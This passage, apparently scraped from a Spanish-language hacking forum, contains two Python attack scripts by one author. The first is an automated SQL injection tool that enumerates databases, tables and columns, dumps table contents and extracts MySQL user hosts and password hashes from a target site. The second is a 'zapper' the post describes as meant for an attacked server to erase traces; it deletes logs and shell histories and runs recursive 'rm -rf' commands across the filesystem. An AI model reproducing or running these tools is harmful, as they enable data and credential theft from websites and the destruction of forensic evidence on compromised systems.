if sys.platform=="win32":
os.system("cls")
else:
os.system("clear")
def savefile(name,text):
file = open(name,"a")
file.write("\n"+text+"\n")
file.close()
def gethost(test):
return urlparse(test).netloc
def header() :
print "\n--== SQL Scanner ==--\n"
def copyright() :
print "\n\n(C) Doddy Hackman 2010\n"
sys.exit(1)
def show() :
print "\n[*] Sintax : ",sys.argv[0]," <web>\n"
def toma(web) :
nave = urllib2.Request(web)
nave.add_header('User-Agent','Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5');
op = urllib2.build_opener()
return op.open(nave).read()
def bypass(bypass):
if bypass == "--":
return("+","--")
elif bypass == "/*":
return("/**/","/*")
else:
return("+","--")
def dumper(web,passx,table,col1,col2):
pass1,pass2 = bypass(passx)
web1 = re.sub("hackman","unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))",web)
web2 = re.sub("hackman","unhex(hex(concat(0x4b30425241,"+col1+",0x4b30425241,0x4B3042524131,"+col2+",0x4B3042524131)))",web)
code1 = toma(web1+pass1+"from"+pass1+table+pass2)
print "\n\n[+] Searching values\n\n"
if (re.findall("K0BRA(.*?)K0BRA",code1)):
numbers = re.findall("K0BRA(.*?)K0BRA",code1)
numbers = numbers[0]
print "[+] Values Found : ",numbers,"\n"
for counter in range(0,int(numbers)):
code2 = toma(web2+pass1+"from"+pass1+table+pass1+"limit"+pass1+repr(counter)+",1"+pass2)
if (re.findall("K0BRA(.*?)K0BRA",code2)):
c1 = re.findall("K0BRA(.*?)K0BRA",code2)
c1 = c1[0]
c2 = re.findall("K0BRA1(.*?)K0BRA1",code2)
c2 = c2[0]
print "["+col1+"] : "+c1
print "["+col2+"] : "+c2+"\n"
savefile("logs/"+gethost(web)+".txt","["+col1+"] : "+c1)
savefile("logs/"+gethost(web)+".txt","["+col2+"] : "+c2+"\n")
else:
print "[-] Not Found\n"
def mysqluser(web,passx):
pass1,pass2 = bypass(passx)
web1 = re.sub("hackman","unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))",web)
web2 = re.sub("hackman","unhex(hex(concat(0x4b30425241,Host,0x4b30425241,0x4B3042524131,User,0x4B3042524131,0x4B3042524132,Password,0x4B3042524132)))",web)
code1 = toma(web1+pass1+"from"+pass1+"mysql.user"+pass2)
print "\n\n[+] Searching mysql.user\n\n"
if (re.findall("K0BRA(.*?)K0BRA",code1)):
numbers = re.findall("K0BRA(.*?)K0BRA",code1)
numbers = numbers[0]
print "[+] mysql.user : ON"
savefile("logs/"+gethost(web)+".txt","[+] mysql.user : ON")
savefile("logs/"+gethost(web)+".txt","[+] Users Found : "+numbers+"\n")
print "[+] Users Found : ",numbers,"\n"
for counter in range(0,int(numbers)):
code2 = toma(web2+pass1+"from"+pass1+"mysql.user"+pass1+"limit"+pass1+repr(counter)+",1"+pass2)
if (re.findall("K0BRA(.*?)K0BRA",code2)):
host = re.findall("K0BRA(.*?)K0BRA",code2)
host = host[0]
user = re.findall("K0BRA1(.*?)K0BRA1",code2)
user = user[0]
passw = re.findall("K0BRA2(.*?)K0BRA2",code2)
passw = passw[0]
savefile("logs/"+gethost(web)+".txt","[Host] : "+host)
savefile("logs/"+gethost(web)+".txt","[User] : "+user)
savefile("logs/"+gethost(web)+".txt","[Pass] : "+passw+"\n")
print "[Host] : "+host
print "[User] : "+user
print "[Pass] : "+passw+"\n"
else:
print "[-] Not Found\n"
def showcolumnsdb(web,db,table,passx):
db = "0x"+str(binascii.hexlify(db))
table = "0x"+str(binascii.hexlify(table))
pass1,pass2 = bypass(passx)
web1 = re.sub("hackman","unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))",web)
web2 = re.sub("hackman","unhex(hex(concat(0x4b30425241,column_name,0x4b30425241)))",web)
code1 = toma(web1+pass1+"from"+pass1+"information_schema.columns"+pass1+"where"+pass1+"table_name="+table+pass1+"and"+pass1+"table_schema="+db+pass2)
print "\n\n[+] Searching columns in DB\n\n"
if (re.findall("K0BRA(.*?)K0BRA",code1)):
numbers = re.findall("K0BRA(.*?)K0BRA",code1)
numbers = numbers[0]
savefile("logs/"+gethost(web)+".txt","[DB] : "+db)
savefile("logs/"+gethost(web)+".txt","[DB] : "+table)
print "[+] information_schema : ON"
print "[+] Columns Found : ",numbers,"\n"
for counter in range(0,int(numbers)):
code2 = toma(web2+pass1+"from"+pass1+"information_schema.columns"+pass1+"where"+pass1+"table_name="+table+pass1+"and"+pass1+"table_schema="+db+pass1+"limit"+pass1+repr(counter)+",1"+pass2)
if (re.findall("K0BRA(.*?)K0BRA",code2)):
column = re.findall("K0BRA(.*?)K0BRA",code2)
column = column[0]
savefile("logs/"+gethost(web)+".txt","[Column Found] : "+column)
print "[Column Found] : "+column
else:
print "[-] Not Found\n"
def showtablesdb(web,db,passx):
db = "0x"+str(binascii.hexlify(db))
pass1,pass2 = bypass(passx)
web1 = re.sub("hackman","unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))",web)
web2 = re.sub("hackman","unhex(hex(concat(0x4b30425241,table_name,0x4b30425241)))",web)
code1 = toma(web1+pass1+"from"+pass1+"information_schema.tables"+pass1+"where"+pass1+"table_schema="+db+pass2)
print "\n\n[+] Searching tables in DB\n\n"
savefile("logs/"+gethost(web)+".txt","[DB] : "+db)
if (re.findall("K0BRA(.*?)K0BRA",code1)):
numbers = re.findall("K0BRA(.*?)K0BRA",code1)
numbers = numbers[0]
print "[+] information_schema : ON"
print "[+] Tables Found : ",numbers,"\n"
for counter in range(0,int(numbers)):
code2 = toma(web2+pass1+"from"+pass1+"information_schema.tables"+pass1+"where"+pass1+"table_schema="+db+pass1+"limit"+pass1+repr(counter)+",1"+pass2)
if (re.findall("K0BRA(.*?)K0BRA",code2)):
table = re.findall("K0BRA(.*?)K0BRA",code2)
table = table[0]
print "[Table Found] : "+table
savefile("logs/"+gethost(web)+".txt","[Table Found] : "+table)
else:
print "[-] Not Found\n"
def showtables(web,passx):
pass1,pass2 = bypass(passx)
web1 = re.sub("hackman","unhex(hex(concat(0x4b30425241,count(table_name),0x4b30425241)))",web)
web2 = re.sub("hackman","unhex(hex(concat(0x4b30425241,table_name,0x4b30425241)))",web)
code1 = toma(web1+pass1+"from"+pass1+"information_schema.tables"+pass2)
print "\n\n[+] Searching tables\n\n"
if (re.findall("K0BRA(.*?)K0BRA",code1)):
numbers = re.findall("K0BRA(.*?)K0BRA",code1)
numbers = numbers[0]
print "[+] information_schema : ON"
print "[+] Tables Found : ",numbers,"\n"
for counter in range(17,int(numbers)):
code2 = toma(web2+pass1+"from"+pass1+"information_schema.tables"+pass1+"limit"+pass1+repr(counter)+",1"+pass2)
if (re.findall("K0BRA(.*?)K0BRA",code2)):
table = re.findall("K0BRA(.*?)K0BRA",code2)
table = table[0]
print "[Table Found] : "+table
savefile("logs/"+gethost(web)+".txt","[Table Found] : "+table)
else:
print "[-] Not Found\n"
def showcolumns(tabla,web,passx):
pass1,pass2 = bypass(passx)
tabla = "0x"+str(binascii.hexlify(tabla))
web1 = re.sub("hackman","unhex(hex(concat(0x4b30425241,count(column_name),0x4b30425241)))",web)
web2 = re.sub("hackman","unhex(hex(concat(0x4b30425241,column_name,0x4b30425241)))",web)
code1 = toma(web1+pass1+"from"+pass1+"information_schema.columns"+pass1+"where"+pass1+"table_name="+tabla+pass2)
print "\n\n[+] Searching tables\n\n"
savefile("logs/"+gethost(web)+".txt","[Table Found] : "+tabla)
if (re.findall("K0BRA(.*?)K0BRA",code1)):
numbers = re.findall("K0BRA(.*?)K0BRA",code1)
numbers = numbers[0]
print "[+] information_schema : ON"
print "[+] Columns Found : ",numbers,"\n"
for counter in range(0,int(numbers)):
code2 = toma(web2+pass1+"from"+pass1+"information_schema.columns"+pass1+"where"+pass1+"table_name="+tabla+pass1+"limit"+pass1+repr(counter)+",1"+pass2)
if (re.findall("K0BRA(.*?)K0BRA",code2)):
column = re.findall("K0BRA(.*?)K0BRA",code2)
column = column[0]
print "[Column Found] : "+column
savefile("logs/"+gethost(web)+".txt","[Column Found] : "+column)
else:
print "[-] Not Found\n"
def showdbs(web,passx):
pass1,pass2 = bypass(passx)
web1 = re.sub("hackman","unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))",web)
web2 = re.sub("hackman","unhex(hex(concat(0x4b30425241,schema_name,0x4b30425241)))",web)
code1 = toma(web1+pass1+"from"+pass1+"information_schema.schemata"+pass2)
print "\n\n[+] Searching DBS\n\n"
if (re.findall("K0BRA(.*?)K0BRA",code1)):
numbers = re.findall("K0BRA(.*?)K0BRA",code1)
numbers = numbers[0]
print "[+] information_schema : ON"
print "[+] DBS Found : ",numbers,"\n"
for counter in range(0,int(numbers)):
code2 = toma(web2+pass1+"from"+pass1+"information_schema.schemata"+pass1+"limit"+pass1+repr(counter)+",1"+pass2)
if (re.findall("K0BRA(.*?)K0BRA",code2)):
db = re.findall("K0BRA(.*?)K0BRA",code2)
db = db[0]
print "[DB Found] : "+db
savefile("logs/"+gethost(web)+".txt","[DB Found] : "+db)
else:
print "[-] Not Found\n"
def menu(page,bypass):
clean()
header()
print "\n[+] Target : ",page,"\n"
print "\n[information_schema]\n\n"
print "1 - Show tables\n"
print "2 - Show columns of the a table\n"
print "3 - Show databases\n"
print "4 - Show tables from the a DB\n"
print "5 - Show columns from the a table of the DB\n"
print "\n[mysql.user]\n\n"
print "6 - Show users\n"
print "\n[Others]\n\n"
print "7 - Show details\n"
print "8 - Dump data\n"
print "9 - Show log\n"
print "10 - Change target\n"
print "11 - Exit\n\n"
try:
op = input("[Option] : ")
if op == 1:
showtables(page,bypass)
raw_input()
menu(page,bypass)
elif op == 2:
table = raw_input("\n\n[Table] : ")
showcolumns(table,page,bypass)
raw_input()
menu(page,bypass)
elif op == 3:
showdbs(page,bypass)
raw_input()
menu(page,bypass)
elif op == 4:
db = raw_input("\n\n[DB] : ")
showtablesdb(page,db,bypass)
raw_input()
menu(page,bypass)
elif op == 5:
db = raw_input("\n\n[DB] : ")
table = raw_input("\n\n[Table] : ")
showcolumnsdb(page,db,table,bypass)
raw_input()
menu(page,bypass)
elif op == 6:
mysqluser(page,bypass)
raw_input()
menu(page,bypass)
elif op == 7:
more(page,bypass)
raw_input()
menu(page,bypass)
elif op == 8:
table = raw_input("\n\n[Table] : ")
col1 = raw_input("\n\n[Column 1] : ")
col2 = raw_input("\n\n[Column 2] : ")
dumper(page,bypass,table,col1,col2)
raw_input()
menu(page,bypass)
elif op == 9:
os.system("start logs/"+gethost(page)+".txt")
menu(page,bypass)
elif op == 10:
sta()
except:
menu(page,bypass)
if op == 11:
copyright()
def more(web,passx):
pass1,pass2 = bypass(passx)
print "\n[+] Searching more data\n"
web1 = re.sub("hackman","unhex(hex(concat(0x334d50335a3452,0x4b30425241,user(),0x4b30425241,database(),0x4b30425241,version(),0x4b30425241,0x334d50335a3452)))",web)
code0 = toma(web1+pass2)
if (re.findall("3MP3Z4R(.*?)3MP3Z4R",code0)):
datax = re.findall("3MP3Z4R(.*?)3MP3Z4R",code0)
datar = re.split("K0BRA",datax[0])
print "[+] Username :",datar[1]
print "[+] Database :",datar[2]
print "[+] Version :",datar[3],"\n"
savefile("logs/"+gethost(web)+".txt","[+] Username : "+datar[1])
savefile("logs/"+gethost(web)+".txt","[+] Database : "+datar[2])
savefile("logs/"+gethost(web)+".txt","[+] Version : "+datar[3]+"\n")
code1 = toma(web1+pass1+"from"+pass1+"mysql.user"+pass2)
if (re.findall("K0BRA",code1)):
print "[+] mysql.user : on"
savefile("logs/"+gethost(web)+".txt","[+] mysql.user : on")
code2 = toma(web1+pass1+"from"+pass1+"information_schema.tables"+pass2)
if (re.findall("K0BRA",code2)):
print "[+] information_schema.tables : on"
savefile("logs/"+gethost(web)+".txt","[+] information_schema.tables : on")
def findlength(web,passx):
pass1,pass2 = bypass(passx)
print "\n[+] Finding columns length"
number = "unhex(hex(concat(0x4b30425241,1,0x4b30425241)))"
for te in range(2,30):
number = str(number)+","+"unhex(hex(concat(0x4b30425241,"+str(te)+",0x4b30425241)))"
code = toma(web+"-1"+pass1+"union"+pass1+"select"+pass1+number+pass2)
if (re.findall("K0BRA(.*?)K0BRA",code)):
numbers = re.findall("K0BRA(.*?)K0BRA",code)
print "[+] Column length :",te
print "[+] Numbers",numbers,"print data"
sql = ""
tex = te + 1
for sqlix in range(2,tex):
sql = str(sql)+","+str(sqlix)
sqli = str(1)+sql
sqla = re.sub(numbers[0],"hackman",sqli)
savefile("logs/"+gethost(web)+".txt","[Target] : "+web+"-1"+pass1+"union"+pass1+"select"+pass1+sqla)
menu(web+"-1"+pass1+"union"+pass1+"select"+pass1+sqla,passx)
print "[-] Length dont found\n"
def scan(web,passx):
pass1,pass2 = bypass(passx)
print "\n\n[+] Testing vulnerability"
code = toma(web+"-1"+pass1+"union"+pass1+"select"+pass1+"1"+pass2)
if (re.findall("The used SELECT statements have a different number of columns",code,re.I)):
print "[+] SQLI Detected"
findlength(web,passx)
else:
print "[-] Not Vulnerable"
copyright()
def sta():
clean()
header()
web = raw_input("\n\n[Page] : ")
bypasx = raw_input("\n\n[Bypass] : ")
scan(web,bypasx)
sta()
#The End
#510
Scripting / [Python] Zapper By Doddy H
7 Octubre 2011, 01:39 AM
Hola a todos.
Acabo de hacer un simple zapper en python , tan solo lo cargan en el sistema web atacado y comienza
a borrar huellas.
Eso si , no me habia dado cuenta de que facil usar python xDD
Acabo de hacer un simple zapper en python , tan solo lo cargan en el sistema web atacado y comienza
a borrar huellas.
Eso si , no me habia dado cuenta de que facil usar python xDD
Código (python) [Seleccionar]
#!usr/bin/python
#Zapper (C) Doddy Hackman
import os
paths = ["/var/log/lastlog", "/var/log/telnetd", "/var/run/utmp","/var/log/secure","/root/.ksh_history", "/root/.bash_history","/root/.bash_logut", "/var/log/wtmp", "/etc/wtmp","/var/run/utmp", "/etc/utmp", "/var/log", "/var/adm",
"/var/apache/log", "/var/apache/logs", "/usr/local/apache/logs","/usr/local/apache/logs", "/var/log/acct", "/var/log/xferlog",
"/var/log/messages/", "/var/log/proftpd/xferlog.legacy","/var/log/proftpd.xferlog", "/var/log/proftpd.access_log","/var/log/httpd/error_log", "/var/log/httpsd/ssl_log","/var/log/httpsd/ssl.access_log", "/etc/mail/access","/var/log/qmail", "/var/log/smtpd", "/var/log/samba",
"/var/log/samba.log.%m", "/var/lock/samba", "/root/.Xauthority","/var/log/poplog", "/var/log/news.all", "/var/log/spooler","/var/log/news", "/var/log/news/news", "/var/log/news/news.all",
"/var/log/news/news.crit", "/var/log/news/news.err", "/var/log/news/news.notice","/var/log/news/suck.err", "/var/log/news/suck.notice","/var/spool/tmp", "/var/spool/errors", "/var/spool/logs", "/var/spool/locks","/usr/local/www/logs/thttpd_log", "/var/log/thttpd_log","/var/log/ncftpd/misclog.txt", "/var/log/nctfpd.errs","/var/log/auth"]
comandos = ['find / -name *.bash_history -exec rm -rf {} \;' , 'find / -name *.bash_logout -exec rm -rf {} \;','find / -name log* -exec rm -rf {} \;','find / -name *.log -exec rm -rf {} \;','unset HISTFILE','unset SAVEHIST']
print "\n[+] Starting the zapper"
for path in paths :
try :
os.delete(path)
except :
pass
for cmd in comandos :
try:
os.system(cmd)
except:
pass
print "[+] All logs are erased\n"
#The End ?